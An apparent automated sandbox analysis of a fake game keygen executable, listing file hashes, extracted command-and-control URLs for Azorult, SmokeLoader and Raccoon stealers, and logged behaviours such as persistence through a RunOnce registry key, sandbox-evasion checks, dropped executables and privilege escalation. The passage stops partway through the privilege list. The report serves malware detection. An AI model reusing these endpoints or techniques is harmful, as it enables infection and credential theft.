Analysis
-
max time kernel
47s -
max time network
422s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
Resource
win10v20201028
General
-
Target
Truck.Driver.Steep.Road.1.0.serials.generator.by.ACME.exe
-
Size
5.4MB
-
MD5
be12bd9c6b6e9e5738e171924e141b7d
-
SHA1
a90d8051e8116fe24abf2605fae1b8ad31f12104
-
SHA256
6ffb691be76a6756dbda8cc9c12b72be6a6eb89fa32770c9f1c201393c4f708c
-
SHA512
8c2031c71b856ab8010cfee225a6987e0eb1d9870c4b154a9a75db1829d0fa790dace44352e3932332e6fc612455ddc42adbc14f6ce9f91b6a736595c2986279
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/5176-149-0x0000000002580000-0x0000000002E8A000-memory.dmp family_glupteba behavioral3/memory/5176-152-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/5176-151-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral3/memory/6552-292-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6552-294-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6552-298-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 12 IoCs
pid Process 2096 keygen-pr.exe 1152 keygen-step-1.exe 1552 keygen-step-3.exe 3884 keygen-step-4.exe 1296 key.exe 512 Setup.exe 916 multitimer.exe 4056 setups.exe 3180 askinstall20.exe 2280 setups.tmp 4496 multitimer.exe 4580 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 2280 setups.tmp 2280 setups.tmp 2280 setups.tmp 2280 setups.tmp 2280 setups.tmp 2280 setups.tmp 2280 setups.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\g4nhshbjdrt = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OR2R4BN5II\\multitimer.exe\" 1 3.1617432446.60680f7e9a04b" multitimer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 140 ipinfo.io 143 ipinfo.io 188 api.ipify.org 204 ip-api.com 264 api.ipify.org 335 ipinfo.io 339 ipinfo.io 379 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 5940 5892 WerFault.exe 140 4364 5860 WerFault.exe 150 6908 5860 WerFault.exe 150 4168 5860 WerFault.exe 150 3640 5860 WerFault.exe 150 7732 5860 WerFault.exe 150 7712 5860 WerFault.exe 150 5352 5860 WerFault.exe 150 7432 5860 WerFault.exe 150 7596 5860 WerFault.exe 150 7380 5860 WerFault.exe 150 4652 7804 WerFault.exe 269 5556 5860 WerFault.exe 150 7304 5860 WerFault.exe 150 1096 5860 WerFault.exe 150 7048 5916 WerFault.exe 131 -
Delays execution with timeout.exe 3 IoCs
pid Process 6188 timeout.exe 3392 timeout.exe 4204 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe -
Kills process with taskkill 7 IoCs
pid Process 4016 taskkill.exe 6996 taskkill.exe 5848 taskkill.exe 676 taskkill.exe 4272 taskkill.exe 8828 taskkill.exe 352 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 06ed24b45528d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{F3B34A42-CC50-4B54-B26B-572FD8C2B04C}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000007ec6a22afb6acc33db3b0b998aab8dafffe147dd04d93194c7d8ebd929aaa18543eedd7006093f712d630d325e03155907de8fd9e7129f50231a18c091f261760d193e8d846ccb5c842b7896e3b9e18668d89d6d3e21d792cfea45d2e587ced3d452869038af98fb0972ebcf0da58c7f3cd095deac08bfd05848125b466b1c7a73a4cb7ce4acfc95976e47eb8df7a6d9bdf5a72f22b28c38462046d9b69f522ce50610518a8e6bbba7d1b0ab6697de870628457bf43fc7de63afeb80082fba1c02711f4f3c207021e4eda012e988699aaf55e904429aba990ab0c7cbdcf2a202e60b93d24ba657dd387f09c558ca76cd23ab0d30afb02b8a555daa3d4713b2447992c6feeaea523f9c9941dac64b5294bd0401028daa403a2d8d2a96b89169a4173a3b41fc0b69e06b533f8c342711c8e56717d69e6ad9b14d44a3c073522e1a88ed3b2c30e9fc1bae90a7b09453905e86e84be763f3adc2fe95e75df96e326998a1270c9ba12c47c07bf144b8d6e6256b787164f05b6d537b7d29f86cc4613940792527be38f54faadc31a85391affd9d025a83c58c085578a81fe7fd7a48379918a02a5cc MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "jyw86su" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 6888 PING.EXE 192 PING.EXE 5716 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 141 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 338 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 345 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2280 setups.tmp 2280 setups.tmp 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe 916 multitimer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4280 MicrosoftEdgeCP.exe 4280 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 512 Setup.exe Token: SeCreateTokenPrivilege 3180 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 3180 askinstall20.exe Token: SeLockMemoryPrivilege 3180 askinstall20.exe Token: SeIncreaseQuotaPrivilege 3180 askinstall20.exe Token: SeMachineAccountPrivilege 3180 askinstall20.exe Token: SeTcbPrivilege 3180 askinstall20.exe Token: SeSecurityPrivilege 3180 askinstall20.exe Token: SeTakeOwnershipPrivilege 3180 askinstall20.exe Token: SeLoadDriverPrivilege 3180 askinstall20.exe Token: SeSystemProfilePrivilege 3180 askinstall20.exe Token: SeSystemtimePrivilege 3180 askinstall20.exe Token: SeProfSingleProcessPrivilege 3180 askinstall20.exe Token: SeIncBasePriorityPrivilege 3180 askinstall20.exe Token: SeCreatePagefilePrivilege 3180 askinstall20.exe Token: SeCreatePermanentPrivilege 3180 askinstall20.exe Token: SeBackupPrivilege 3180 askinstall20.exe Token: SeRestorePrivilege 3180 askinstall20.exe Token: SeShutdownPrivilege 3180 askinstall20.exe Token: SeDebugPrivilege 3180 askinstall20.exe Token: SeAuditPrivilege 3180 askinstall20.exe Token: SeSystemEnvironmentPrivilege 3180 askinstall20.exe Token: SeChangeNotifyPrivilege 3180 askinstall20.exe Token: SeRemoteShutdownPrivilege 3180 askinstall20.exe Token: SeUndockPrivilege 3180 askinstall20.exe Token: SeSyncAgentPrivilege 3180 askinstall20.exe Token: 